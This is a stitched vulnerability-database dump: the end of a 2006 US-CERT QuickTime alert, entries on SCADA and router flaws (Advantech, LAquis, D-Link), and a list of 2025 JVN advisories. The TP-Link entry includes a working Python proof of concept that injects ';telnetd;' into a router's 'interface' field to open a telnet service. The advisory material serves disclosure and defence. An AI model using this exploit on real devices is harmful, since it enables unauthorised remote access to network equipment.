<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2340> * CVE-2005-4092 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092> * CVE-2005-3707 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3707> * CVE-2005-3710 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3710> * CVE-2005-3713 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3713> * Security Content for QuickTime 7.0.4 - <http://docs.info.apple.com/article.html?artnum=303101> * QuickTime 7.0.4 - <http://www.apple.com/support/downloads/quicktime704.html> * About the Mac OS X 10.4.4 Update (Delta) - <http://docs.info.apple.com/article.html?artnum=302810> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA06-011A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA06-011A Feedback VU#913449" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History January 11, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ8V8iX0pj593lg50AQJ85wf+OuHVseQVzZ0uI8h8TnmtAJmjzV6tp3Cj 34jwpSLlvo5S8svIHChcX/BYOwKVL/uQZswsjk/mbEu+TrPcVKPd7VPCetxIXVey AdC5hsAH1Wm0MnvY1LgvONo8IQ9RlT6Rj6fY7k7QhPUWsYxj/rDCWDAY9kgsHXc/ HpXWL/Cy5va35z8aYHrLVlxmofKrOWtX0PVa6lSKV8lIsY+TDihA5tYIb5wRDVxL osieJ+MHSXGchXpjX2c0o6Ja6vhJNR61LEwelk9FMLT1JRTkp+wz9/AoVUSyZ/hy 0WBP0M8cwl8koWgijNcLXA18YX8QtDftAVRwpwHKMrbNCYdrWblYVw== =5Kiq -----END PGP SIGNATURE-----
var-201601-0038 Multiple stack-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x2790 IOCTL in the DrawSrv subsystem. A stack-based buffer overflow vulnerability exists in a call to BwBuildPath with the Path parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems
var-201801-0394 TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-interface variable in the cmxddns.lua file. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices. These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled). Vulnerability Type: ================ Command Injection (Authenticated) Product: ================ We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306). And the following model should also be affected and the vendor has confirmed: TP-Link ER5110G, TP-Link ER5120G, TP-Link ER5510G, TP-Link ER5520G, TP-Link R4149G, TP-Link R4239G, TP-Link R4299G, TP-Link R473GP-AC, TP-Link R473G, TP-Link R473P-AC, TP-Link R473, TP-Link R478G+, TP-Link R478, TP-Link R478+, TP-Link R483G, TP-Link R483, TP-Link R488, TP-Link WAR1300L, TP-Link WAR1750L, TP-Link WAR2600L, TP-Link WAR302, TP-Link WAR450L, TP-Link WAR450, TP-Link WAR458L, TP-Link WAR458, TP-Link WAR900L, TP-Link WVR1300G, TP-Link WVR1300L, TP-Link WVR1750L, TP-Link WVR2600L, TP-Link WVR300, TP-Link WVR302, TP-Link WVR4300L, TP-Link WVR450L, TP-Link WVR450, TP-Link WVR458L, TP-Link WVR900G, TP-Link WVR900L CVE details: ================ The detail of each vulnerability are as follows: CVE-2017-15613: new-interface variable in the cmxddns.lua file CVE-2017-15614: new-outif variable in the pptp_client.lua file CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file CVE-2017-15616: new-interface variable in the phddns.lua file CVE-2017-15617: iface variable in the interface_wan.lua file CVE-2017-15618: new-enable variable in the pptp_client.lua file CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file CVE-2017-15620: new-zone variable in the ipmac_import.lua file CVE-2017-15621: olmode variable in the interface_wan.lua file CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file CVE-2017-15623: new-enable variable in the pptp_server.lua file CVE-2017-15624: new-authtype variable in the pptp_server.lua file CVE-2017-15625: new-olmode variable in the pptp_client.lua file CVE-2017-15626: new-bindif variable in the pptp_server.lua file CVE-2017-15627: new-pns variable in the pptp_client.lua file CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file CVE-2017-15631: new-workmode variable in the pptp_client.lua file CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file CVE-2017-15633: new-ipgroup variable in the session_limits.lua file CVE-2017-15634: name variable in the wportal.lua file CVE-2017-15635: max_conn variable in the session_limits.lua file CVE-2017-15636: new-time variable in the webfilter.lua file CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file Credits: ================ chunibalon, puzzor @VARAS of IIE Timeline: ================ 2017.08 to 2017.09: Issues found. 2017.09.26: Vendor contacted. 2017.10.13: Vendor confirmed. 2017.10.14: CVE id requested. 2017.10.19: CVE id assigned. 2018.1: Vendor confirmed that all effected products have been fixed. Vulnerability detail: ================ These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616. Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file. In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113: *********************************** function add_phddns(http_form) local form_data = json.decode(http_form.data) local jdata = form_data.params.new ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil) if not ret then return false, err.ERR_COM_TABLE_ITEM_UCI_ADD end if not uci_r:commit(CONFIG_NAME) then return false, err.ERR_COM_UCI_COMMIT end -- add the ref of interface ifs.update_if_reference(jdata.interface, 1) sys.fork_exec('/etc/init.d/phddns restart') userconfig.cfg_modify() return jdata end *********************************** This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns". The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently. Then the malformed value of "interface" argument causes the command injection vulnerability. PoC file: ================ *********************************** import requests import urllib import json # This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616. # To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin' PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406' BASEURL = 'http://192.168.123.1' LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login' MARK = '###' VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK) headers = { "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": BASEURL[7:], "Origin": BASEURL, "Referer": "%s/webpages/login.html" % (BASEURL), "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36", "X-Requested-With": "XMLHttpRequest" } login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}} login_data = {'data':json.dumps(login_data_value)} s = requests.Session() s.headers.update(headers) print (LOGINURL) print (login_data) res = s.post(LOGINURL, data=login_data) stok = eval(res.text)['result']['stok'] print '[*] stok is %s' % (stok) tmp_vul = VULURL.replace(MARK, stok) print '[*] vul_url is %s ' % (tmp_vul) delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}} delete_data = {'data': json.dumps(delete_data)} print '[+] delete existed rule' res = s.post(tmp_vul, data=delete_data) print '[*] response is: %s' % (res.text) # after executing this payload, the router will open its telnetd service. payload = ''';telnetd;''' vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}} vul_data = {'data': json.dumps(vul_data)} print '[+] sending payload' res = s.post(tmp_vul, data=vul_data) print '[*] response is: %s' % (res.text) *********************************** Reference: ================ https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
var-201801-0152 An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27ec IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3
var-201801-0151 A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwscrp utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable
var-201902-0647 LCDS Laquis SCADA prior to version 4.1.0.4150 allows execution of script code by opening a specially crafted report format file. This may allow remote code execution, data exfiltration, or cause a system crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the MemoryWriteLong method. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the aq process. Script embedded in a crafted file can create files in arbitrary locations using the Ini.WriteNumber method. LAquis SCADA is a suite of SCADA software for monitoring and data acquisition
var-201906-1029 In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products
var-202007-0395 Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities that are vulnerable to the use of an attacker-controlled string in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code. Advantech iView Has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put in a state. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech iView. Authentication is not required to exploit this vulnerability.The specific flaw exists within the NetworkServlet servlet. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Advantech iView is a device management application provided by Advantech
var-202305-0214 D-Link DIR-2640 HNAP LoginPassword Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-2640 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management interface, which listens on TCP port 80 by default. A specially crafted login request can cause authentication to succeed without providing proper credentials. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19549. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
var-202305-0130 D-Link DIR-2640 EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2640 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the EmailFrom parameter provided to the HNAP1 endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19550. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
var-202308-4331 D-Link DAP-2622 DDP Firmware Upgrade Filename Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20077. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3186 D-Link DAP-2622 DDP Configuration Backup Server IPv6 Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20066. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3151 D-Link DAP-2622 DDP User Verification Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20053. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3130 D-Link DAP-2622 DDP Configuration Restore Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20069. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3129 D-Link DAP-2622 DDP Set AG Profile Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20079. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3114 D-Link DAP-2622 DDP Reset Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20057. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3113 D-Link DAP-2622 DDP Configuration Backup Server Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20067. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3105 D-Link DAP-2622 DDP Reset Factory Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20058. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3456 D-Link DAP-2622 DDP Reboot Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20055. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3426 D-Link DAP-2622 DDP Configuration Backup Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20065. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3391 D-Link DAP-2622 DDP User Verification Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20052. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3319 D-Link DAP-2622 DDP Set SSID List Missing Authentication Vulnerability. This vulnerability allows network-adjacent attackers to make unauthorized changes to device configuration on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to manipulate wireless authentication settings. Was ZDI-CAN-20104. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company. No detailed vulnerability details are currently provided
var-202308-3121 D-Link DAP-2622 DDP Reboot Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20054. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3323 D-Link DAP-2622 DDP Change ID Password Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20060. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3219 D-Link DAP-2622 DDP Change ID Password New Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20063. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3185 D-Link DAP-2622 DDP Configuration Backup Filename Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20068. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3150 D-Link DAP-2622 DDP Change ID Password New Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20062. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3131 D-Link DAP-2622 DDP Reset Factory Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20059. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3120 D-Link DAP-2622 DDP Configuration Backup Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20064. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3106 D-Link DAP-2622 DDP Reset Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20056. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
jvndb-2025-000029 Multiple vulnerabilities in Quick Agent 2025-04-25T13:49+09:00 2025-04-25T13:49+09:00
jvndb-2025-000028 i-PRO Configuration Tool vulnerable to use of hard-coded cryptographic key 2025-04-24T13:50+09:00 2025-04-24T13:50+09:00
jvndb-2025-000027 Active! mail vulnerable to stack-based buffer overflow 2025-04-18T16:50+09:00 2025-04-18T16:50+09:00
jvndb-2016-000129 Android OS issue where it is affected by the CRIME attack 2016-07-25T11:15+09:00 2025-04-18T16:36+09:00
jvndb-2025-003213 TP-Link Deco BE65 Pro vulnerable to OS command injection 2025-04-11T13:52+09:00 2025-04-11T13:52+09:00
jvndb-2025-000026 Multiple vulnerabilities in BizRobo! 2025-04-10T15:36+09:00 2025-04-10T15:36+09:00
jvndb-2025-003091 Multiple vulnerabilities in Trend Micro Endpoint security products for enterprises (April 2025) 2025-04-09T14:55+09:00 2025-04-09T14:55+09:00
jvndb-2025-002990 Multiple vulnerabilities in Inaba Denki Sangyo Wi-Fi AP UNIT 'AC-WPS-11ac series' 2025-04-07T17:44+09:00 2025-04-07T17:44+09:00
jvndb-2025-002714 Improper symbolic link file handling in FutureNet NXR series, VXR series and WXR series routers 2025-03-31T16:59+09:00 2025-04-03T15:19+09:00
jvndb-2025-000025 WinRAR vulnerable to the symbolic link based "Mark of the Web" check bypass 2025-04-03T12:29+09:00 2025-04-03T12:29+09:00
jvndb-2025-000022 Multiple vulnerabilities in JTEKT ELECTRONICS CORPORATION's products 2025-04-02T15:12+09:00 2025-04-02T15:12+09:00
jvndb-2025-002790 Out-of-bounds Write vulnerabilities in Canon Printer Drivers for Production Printers, Office/Small Office Multifunction Printers and Laser Printers 2025-04-02T15:05+09:00 2025-04-02T15:05+09:00
jvndb-2025-000023 WordPress plugin "Welcart e-Commerce" vulnerable to untrusted data deserialization 2025-04-01T14:20+09:00 2025-04-01T14:20+09:00
jvndb-2024-003016 Multiple vulnerabilities in home gateway HGW BL1500HM 2024-03-25T17:28+09:00 2025-03-28T12:01+09:00
jvndb-2025-000018 Multiple vulnerabilities in home gateway HGW-BL1500HM 2025-03-19T15:33+09:00 2025-03-28T11:48+09:00
jvndb-2025-000024 a-blog cms vulnerable to untrusted data deserialization 2025-03-28T10:46+09:00 2025-03-28T10:46+09:00
jvndb-2025-000021 Multiple vulnerabilities in PowerCMS 2025-03-26T18:13+09:00 2025-03-26T18:13+09:00
jvndb-2025-002592 Multiple vulnerabilities in CHOCO TEI WATCHER mini 2025-03-26T13:25+09:00 2025-03-26T13:25+09:00
jvndb-2025-000019 Multiple vulnerabilities in AssetView 2025-03-25T17:10+09:00 2025-03-25T17:10+09:00
jvndb-2025-000020 +F FS010M vulnerable to OS command injection 2025-03-18T15:01+09:00 2025-03-18T15:01+09:00
jvndb-2025-000017 hostapd vulnerable to improper processing of RADIUS packets 2025-03-12T14:19+09:00 2025-03-12T14:19+09:00
jvndb-2025-000016 Multiple vulnerabilities in RemoteView Agent (for Windows) 2025-03-06T14:27+09:00 2025-03-10T15:22+09:00
jvndb-2025-001898 Multiple vulnerabilities in FutureNet AS series (Industrial Routers) and FA series (Protocol Conversion Machine) 2025-03-04T14:56+09:00 2025-03-04T14:56+09:00
jvndb-2025-001605 "RoboForm Password Manager" App for Android vulnerable to authentication bypass using an alternate path or channel 2025-02-20T20:15+09:00 2025-02-20T20:15+09:00
jvndb-2025-000004 Multiple vulnerabilities in I-O DATA router UD-LT2 2025-01-22T13:55+09:00 2025-02-20T15:55+09:00
jvndb-2025-000014 Multiple cross-site scripting vulnerabilities in Movable Type 2025-02-19T16:19+09:00 2025-02-19T16:19+09:00
jvndb-2025-000015 RevoWorks SCVX and RevoWorks Browser vulnerable to incorrect resource transfer between spheres 2025-02-19T14:51+09:00 2025-02-19T14:51+09:00
jvndb-2025-001563 Out-of-bounds write vulnerability in FUJIFILM Business Innovation Corp. MFPs 2025-02-18T16:33+09:00 2025-02-18T16:33+09:00
jvndb-2025-001562 Out-of-bounds read vulnerability in OMRON CX-Programmer 2025-02-18T16:24+09:00 2025-02-18T16:24+09:00
jvndb-2024-000114 Multiple vulnerabilities in baserCMS 2024-10-25T15:07+09:00 2025-02-18T15:35+09:00